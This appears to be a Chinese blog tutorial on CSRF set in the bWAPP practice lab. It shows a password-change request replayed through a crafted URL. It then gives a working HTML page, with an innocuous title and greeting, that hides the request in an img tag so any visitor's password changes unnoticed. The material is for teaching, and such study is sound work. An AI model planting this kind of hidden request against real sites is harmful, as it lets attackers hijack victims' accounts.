31、CSRF漏洞介绍

∥☆過路亽.° 提交于 2020-01-04 01:12:02
CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作
CSRF和XSS区别:
1、CSRF需要登陆后操作,XSS不需要
2、CSRF通过伪装成受信任用户请求受信任的网站

一、环境:BWAPP

二、登陆,默认账号为:bee,密码为:bug

在这里插入图片描述

三、选择从在csrf的页面,将密码修改为1111,change

在这里插入图片描述

四、分析url

http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change

五、退出账号,重新登陆一下,密码已经修改为1111

六、重修修改一下url,直接访问这个这个地址,

http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change
密码被重置为2222

七、隐蔽利用

1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,
<!DOCTYPE html>
<html>
<head>
	<title>哎呦不错哦。。。</title>
</head>
	<body>
	      <h2>好久不见<h2>
		  <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change">
	</body>
</html>
2、访问这个htmll,自动访问修改后的url,密码也自动修改了
禁止非法,后果自负
欢迎关注公众号:web安全工具库

在这里插入图片描述

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!